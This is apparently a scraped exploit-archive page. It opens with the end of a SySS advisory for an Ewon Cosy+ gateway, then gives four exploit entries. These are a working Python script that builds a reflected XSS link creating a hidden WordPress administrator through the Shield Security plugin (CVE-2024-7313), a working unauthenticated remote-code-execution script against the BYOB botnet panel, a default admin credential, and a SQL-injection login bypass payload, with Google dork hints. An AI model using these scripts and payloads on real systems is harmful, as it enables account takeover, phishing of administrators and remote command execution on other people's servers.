/> the vulnerability will be published within a talk at DEF CON[7]<br /> in August<br />2024-07-12: Manufacturer responded that the fix is planned by the end of<br /> July; manufacturer asked again for reviewing the blog post<br /> draft<br />2024-07-12: Again confirmed reviewing the blog post is possible and asking<br /> for the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post and confirmed that a<br /> fix is provided<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-018<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-018.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33896<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33896<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay41IACgkQrgyb+PE0<br />i1PIhQ//YBS1kK+SZAdwVcRCA1fPxKdfHVlHswwiQzyNWvTso35HsQm+cYOJd/zL<br />gb9JJ0VqgohVezL9UVJhkbEVZbUNwAX13XpcjQimsxcVgx5jCus/4JUCH3+9vPCx<br />lZyc+r5gzP7d3/a1sfGO739bkg8+itkp9jxhoZm5WOA+eg5Tz1j4tJN4uU79ikax<br />5HGubG3dxWq2EQPeEa4+eyKgQCRQTZzX+fiyqfSbRMQq7v4/GbMqH3FtI1CzxoZ3<br />HfsxQyPu3eUjQuykpMauwuwSgs11Yop9EBDzTuH1+OTmWUMy9exWmixcj/Sst+D9<br />6rHQkY+CozFy0ml4mQtp/CpN+Jj0op+BtSw1ILwLUL3aqXa96Ud+62ht9EDBQn/9<br />repfcR5hx9Lj9gfrn46ciW8S/Zy5PghYjOvxC75rsiU3ZHhp/aNF9uKgrdnbZGQe<br />+CzompLF3pM8bCSwtUEauEfK+XArUg0oiN/d2Dl3LMqHJoK4Q1DkgD5v4POmtHsM<br />HaSuE0i57fezwnELg5XNLKRpno57I4LEn1CWm4qebyJvAkodO32DGWAx+Qfh34tG<br />R3Lj71uH1ffepHxMzPsW1WHHnOqjsXQIYw6yq6eJqHwS/ygR/OTVnGri5e4Xq/tN<br />AZyo5WrR3iTmZMBhPAaDoLfclUG4IucGdJKGop9IKkeNTHXkuGk=<br />=75wq<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code># Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation<br /># Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK)<br /># Date: 16/08/2024<br /># Exploit Author: Tim Lepp<br /># Vendor Homepage: https://getshieldsecurity.com/<br /># Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5)<br /># Version: <20.0.6<br /># Tested on: Ubuntu<br /># CVE : CVE-2024-7313<br /><br />How It Works<br /><br /> * The script first checks if the target WordPress installation is using a vulnerable version of the Shield Security plugin by examining the response from the wp-login.php page.<br /> * If the plugin version is vulnerable, it proceeds to generate a reflected XSS payload that, when executed, will create a new admin user with a hardcoded password as WordPress wont accept weak passwords without user intervention.<br /> * The payload is created to first use a GET request to dynamically find the WordPress nonce used for account creation, then use that nonce to submit a POST request to the user creation endpoint with the details of the new user given in the script.<br /> *<br />The payload is then URL-encoded and displayed for use in the attack.<br /> *<br />Once sent to an administrator of the site and the link is clicked, a new Administrator user will be created on the site with the details parsed by the script. This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background.<br /><br />Reference<br />https://research.cleantalk.org/cve-2024-7313/<br /><br /><br />Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main<br /><br /><br />--- code ---<br /><br />import sys<br />import urllib.parse<br />import requests<br />from bs4 import BeautifulSoup<br /><br /># Color codes for terminal output<br />red = '\033[91m'<br />green = '\033[92m'<br />yellow = '\033[93m'<br />blue = '\033[96m'<br />purple = '\033[95m'<br />reset = '\033[0m'<br /><br /># Banner and vulnerability information - Displayed at the start of the script<br />def print_banner():<br /> print(f"""{red}<br />#############################################################################<br /># #<br /># #<br /># ______ _______ ____ ___ ____ _ _ _____ _____ _ _____ #<br /># / ___\ \ / | ____| |___ \ / _ |___ \| || | |___ |___ // |___ / #<br /># | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ / / |_ \| | |_ \ #<br /># | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ / ___) | |___) | #<br /># \____| \_/ |_____| |_____|\___|_____| |_| /_/ |____/|_|____/ #<br /># #<br /># Shield Security Plugin Vulnerability (CVE-2024-7313) #<br /># Reflected XSS in WordPress Shield Security Plugin #<br /># Versions Affected: < 20.0.6 #<br /># Risk: High #<br /># Discovered by: Wayne-Kerr #<br /># Published: August 7, 2024 #<br />############################################################################# <br /> {reset}""")<br /><br /># Help menu - Provides instructions when '-h' or '--help' is used<br />def print_help():<br /> print(f"""{yellow}<br />Usage: python3 exploit.py <target_url><br /><br />Example:<br /> python3 exploit.py http://example.com<br /><br />Options:<br /> -h, --help Show this help message and exit<br />{reset}""")<br /><br /># Format the target URL - Ensures the URL starts with "http://" or "https://"<br />def format_target_url(target_url):<br /> if target_url.startswith("http://") or target_url.startswith("https://"):<br /> return target_url<br /> else:<br /> return f"http://{target_url}"<br /><br /># Check if the target is vulnerable by accessing the wp-login.php page<br />def check_vulnerability(target_url):<br /> try:<br /> response = requests.get(f"{target_url}/wp-login.php")<br /> if response.status_code == 200:<br /> # Try to extract version information from the response<br /> version_info = response.text.split("ver=")[-1].split("\"")[0]<br /> version = version_info.split(".")<br /> major_version = int(version[0])<br /> minor_version = int(version[1])<br /> patch_version = int(version[2].split('&')[0])<br /><br /> # Check if the version is below 20.0.6<br /> if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6):<br /> print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}")<br /> return True<br /> else:<br /> print(f"{yellow}Version not vulnerable.{reset}")<br /> return False<br /> else:<br /> print(f"{red}Failed to retrieve the version information.{reset}")<br /> return False<br /> except Exception as e:<br /> print(f"{red}Error occurred while checking vulnerability: {e}{reset}")<br /> return False<br /><br /># Generate the XSS payload URL that exploits the vulnerability<br />def generate_xss_payload(target_url, username, email, first_name, last_name):<br /> # Hardcoded password for the new admin account to be created<br /> hardcoded_password = "HaxorStrongAFPassword123!!"<br /><br /> # The payload template for the XSS attack<br /> payload_template = (<br /> "var xhrNonce = new XMLHttpRequest(); "<br /> "xhrNonce.open('GET', '/wp-admin/user-new.php', true); "<br /> "xhrNonce.onload = function() {{ "<br /> "if (xhrNonce.status === 200) {{ "<br /> "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; "<br /> "var xhr = new XMLHttpRequest(); "<br /> "xhr.open('POST', '/wp-admin/user-new.php', true); "<br /> "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); "<br /> "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); "<br /> "xhr.setRequestHeader('Origin', '{target}'); "<br /> "var params = 'action=createuser&_wpnonce_create-user=' + nonce + "<br /> "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php"<br /> "&user_login={username}&email={email}"<br /> "&first_name={first_name}&last_name={last_name}&url=test"<br /> "&pass1={password}&pass2={password}&role=administrator"<br /> "&createuser=Add+New+User'; "<br /> "xhr.send(params); "<br /> "xhr.onload = function() {{ "<br /> "if (xhr.status == 200) {{ "<br /> "console.log('Admin user created successfully'); "<br /> "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; "<br /> "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} "<br /> "}}; "<br /> "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; "<br /> "xhrNonce.send();"<br /> )<br /><br /> # Formatting the payload with the provided details<br /> payload = payload_template.format(<br /> target=target_url,<br /> username=username,<br /> email=urllib.parse.quote(email),<br /> first_name=first_name,<br /> last_name=last_name,<br /> password=urllib.parse.quote(hardcoded_password)<br /> )<br /><br /> # URL encode the payload and generate the full URL for the XSS attack<br /> encoded_payload = urllib.parse.quote(f"<script>{payload}</script>")<br /> full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}"<br /><br /> return full_url<br /><br />if __name__ == "__main__":<br /> try:<br /> # Print the banner<br /> print_banner()<br /><br /> # Check for help menu flag and print help if necessary<br /> if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:<br /> print_help()<br /> sys.exit(0)<br /><br /> # Get the target URL from the command-line argument<br /> raw_target_url = sys.argv[1]<br /> target_url = format_target_url(raw_target_url)<br /><br /> # Check if the target is vulnerable<br /> if not check_vulnerability(target_url):<br /> sys.exit(1)<br /><br /> # Get user input for the new admin account details<br /> username = input(f"{blue}Enter username: {reset}")<br /> email = input(f"{blue}Enter email: {reset}")<br /> first_name = input(f"{blue}Enter first name: {reset}")<br /> last_name = input(f"{blue}Enter last name: {reset}")<br /><br /> # Display the hardcoded password<br /> hardcoded_password = "HaxorStrongAFPassword123!!"<br /> print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}")<br /><br /> # Generate and display the XSS payload URL<br /> xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name)<br /> print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}")<br /><br /> # Handle keyboard interruption<br /> except KeyboardInterrupt:<br /> print(f"\n{red}Script interrupted by user.{reset}")<br /> sys.exit(1)<br /> # Catch any other exceptions and display an error message<br /> except Exception as e:<br /> print(f"{red}An error occurred: {e}{reset}")<br /> sys.exit(1)<br /></code></pre>
<pre><code># Exploit Title: BYOB (Build Your Own Botnet) v2.0.0 Unauthenticated RCE (Remote Code Execution)<br /># Date: 2024-08-14<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/malwaredllc/byob<br /># Version: v2.0.0<br /># Tested on: Ubuntu 22.04 LTS, Python 3.10.12, change numpy==1.17.3->numpy<br /># CVE: CVE-2024-?????, CVE-2024-?????<br /># Description: This exploit works by spoofing an agent callback to overwrite the sqlite database and bypass authentication, then exploiting an authenticated command injection in the payload builder page<br /># Github: <br /># Blog: <br />import sys<br />import json<br />import base64<br />import string<br />import random<br />import argparse<br />import requests<br /><br />from bs4 import BeautifulSoup<br /><br /><br />def get_csrf(session, url):<br /> r = session.get(url)<br /> soup = BeautifulSoup(r.text, 'html.parser')<br /> csrf_token = soup.find('input', {'name': 'csrf_token'})['value']<br /> return csrf_token<br /><br /><br />def upload_database(session, url, filename):<br /> with open('database.db', 'rb') as f:<br /> bindata = f.read()<br /> data = base64.b64encode(bindata).decode('ascii')<br /> json_data = {'data': data, 'filename': filename, 'type': "txt", 'owner': "admin", "module": "icloud", "session": "lol"}<br /> headers = {<br /> 'Content-Length': str(len(json.dumps(json_data)))<br /> }<br /> print("[***] Uploading database")<br /> upload_response = session.post(f"{url}/api/file/add", data=json_data, headers=headers)<br /> print(upload_response.status_code)<br /> return upload_response.status_code<br /><br /><br />def exploit(url, username, password, user_agent, command):<br /> s = requests.Session()<br /> # This is to ensure reliability, as the application cwd might change depending on the stage of the docker run process<br /> filepaths = ["/proc/self/cwd/buildyourownbotnet/database.db", "/proc/self/cwd/../buildyourownbotnet/database.db", "/proc/self/cwd/../../../../buildyourownbotnet/database.db", "/proc/self/cwd/instance/database.db", "/proc/self/cwd/../../../../instance/database.db", "/proc/self/cwd/../instance/database.db"]<br /> failed = True<br /> for filepath in filepaths:<br /> if upload_database(s, url, filepath) != 500:<br /> failed = False<br /> break<br /> if failed:<br /> print("[!!!] Failed to upload database, exiting")<br /> sys.exit(1)<br /><br /> if password is None:<br /> password = ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(32)])<br /> print(username + ":" + password)<br /><br /> register_csrf = get_csrf(s, f'{url}/register')<br /> headers = {<br /> 'User-Agent': user_agent,<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> }<br /> data = {<br /> 'csrf_token': register_csrf,<br /> 'username': username,<br /> 'password': password,<br /> 'confirm_password': password,<br /> 'submit': 'Sign Up'<br /> }<br /> print("[***] Registering user ")<br /> regsiter_response = s.post(f'{url}/register', headers=headers, data=data)<br /> print(regsiter_response.status_code)<br /><br /> login_csrf = get_csrf(s, f'{url}/login')<br /> data = {<br /> 'csrf_token': login_csrf,<br /> 'username': username,<br /> 'password': password,<br /> 'submit': 'Log In'<br /> }<br /> print("[***] Logging in")<br /> login_response = s.post(f'{url}/login', headers=headers, data=data)<br /> print(login_response.status_code)<br /><br /> headers = {<br /> 'User-Agent': user_agent,<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> }<br /> data = f'format=exe&operating_system=nix$({command})&architecture=amd64'<br /> try:<br /> s.post(f'{url}/api/payload/generate', headers=headers, data=data, stream=True, timeout=0.0000000000001)<br /> except requests.exceptions.ReadTimeout:<br /> pass<br /><br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("-t", "--target", help="The target URL of the BYOB admin panel", required=True)<br />parser.add_argument("-u", "--username", help="The username to set for the new admin account", default='admin')<br />parser.add_argument("-p", "--password", help="The password to set for the new admin account", default=None)<br />parser.add_argument("-A", "--user-agent", help="The user-agent to use for requests", default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36')<br />parser.add_argument("-c", "--command", help="The command to execute on the BYOB server", required=True)<br /><br />args = parser.parse_args()<br /><br />exploit(args.target.rstrip("/"), args.username, args.password, args.user_agent, args.command)<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Insurance 1.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://demo.phpscriptpoint.com/insurance/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 1234<br /><br />[+] https://www/127.0.0.1/demo/phpscriptpointcom/insurance/admin<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Hotel Management System 1.0 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use Payload : user&pass = ' or 0=0 ##<br /><br />[+] http://127.0.0.1/hotel/admin/index.php?page=home<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>